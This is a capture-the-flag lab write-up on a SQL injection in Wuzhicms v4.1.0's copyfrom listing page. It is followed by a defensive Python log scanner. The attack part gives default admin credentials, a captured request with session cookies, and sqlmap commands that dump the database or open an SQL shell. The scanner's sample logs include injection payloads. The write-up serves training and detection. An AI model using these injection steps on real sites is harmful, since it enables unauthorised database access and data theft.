Lab introduction
Wuzhicms v4.1.0 was found to contain a SQL injection vulnerability, triggered through the $keywords parameter in /core/admin/copyfrom.php.
Login path
Username: admin
Password: admin123
For the captcha, click the refresh link below it.
We're just script kiddies here: copy and go. A ready-made PoC is a wonderful thing.
Because of how the lab is set up, a "www" is added to the path; wait a little longer and you'll be logged in.
/www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms
Request
After logging in you have a cookie; capture a request and replace it, or just replace the URL.
URL: /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1
GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1* HTTP/1.1
Host: eci-2zefy6gjpark7avjqvo8.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.1105117036.1705648933; _ga_J1DQF09WZC=GS1.2.1705648933.1.1.1705649285.0.0.0; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1712050349,1712106330,1712114403,1712226018; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1712226018; PHPSESSID=00e6edb34e0ddf4d7bb76ec5e4584e24; Jun_uid=c69f9xvMa6cghiVDV0FDDk6aL3KWLVkzlvbRrG3D; Jun_username=d56945sjVzGpntSFtL2J4X9AFh4x8W25X83xd4MtfZn5iA; Jun_wz_name=d751r0Z0zqqA8rIdysX%2BL2zsZHFjTBawEq%2BYn%2Fsxy%2FJsnw; Jun_siteid=0917PnFizP6GVj9A0iwK0VbSAYUfnghRaxjBaxly
Connection: close
Run sqlmap
python sqlmap.py -r 1.txt -D wuzhicms -T flllaaaag --dump
The flag comes straight out.
Or use --sql-shell:
select * from flllaaaag
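From the defender's side, here is an added example (not from the original writeup): a short Python scan over a few constructed access-log lines that flags requests to the copyfrom listing action whose keywords value carries SQL syntax, or that arrive with sqlmap's default user-agent. The combined log format and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the original page).
SAMPLE_LOG = """\
10.0.0.5 - - [04/Apr/2024:10:01:01 +0800] "GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&keywords=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Apr/2024:10:02:13 +0800] "GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&keywords=1%27%20AND%20SLEEP(5)--%20 HTTP/1.1" 200 4800 "-" "Mozilla/5.0"
10.0.0.9 - - [04/Apr/2024:10:02:14 +0800] "GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&keywords=1%27%20UNION%20SELECT%201,2,3--%20 HTTP/1.1" 200 4800 "-" "sqlmap/1.8"
10.0.0.7 - - [04/Apr/2024:10:03:00 +0800] "GET /www/index.php?m=content&f=content&v=listing HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

# Combined-log-format line: client IP, timestamp, request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# SQL syntax that has no business in a plain search string for the listing page.
SQLI_RE = re.compile(
    r"""('|"|--|#|/\*|\bUNION\b|\bSELECT\b|\bSLEEP\s*\(|\bBENCHMARK\s*\()""", re.I
)

def is_copyfrom_listing(query):
    """True when the query string targets the copyfrom listing action."""
    return (query.get("m") == ["core"] and query.get("f") == ["copyfrom"]
            and query.get("v") == ["listing"])

def analyse_line(line):
    """Return a finding dict for a suspicious copyfrom request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
    if not is_copyfrom_listing(query):
        return None
    reasons = []
    for value in query.get("keywords", []):  # parse_qs has already percent-decoded it
        if SQLI_RE.search(value):
            reasons.append(f"SQL syntax in keywords: {value!r}")
    if m.group("ua").lower().startswith("sqlmap"):
        reasons.append("sqlmap default user-agent")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "reasons": reasons}

def scan(log_text):
    """Run analyse_line over every line and keep only the findings."""
    return [hit for hit in map(analyse_line, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```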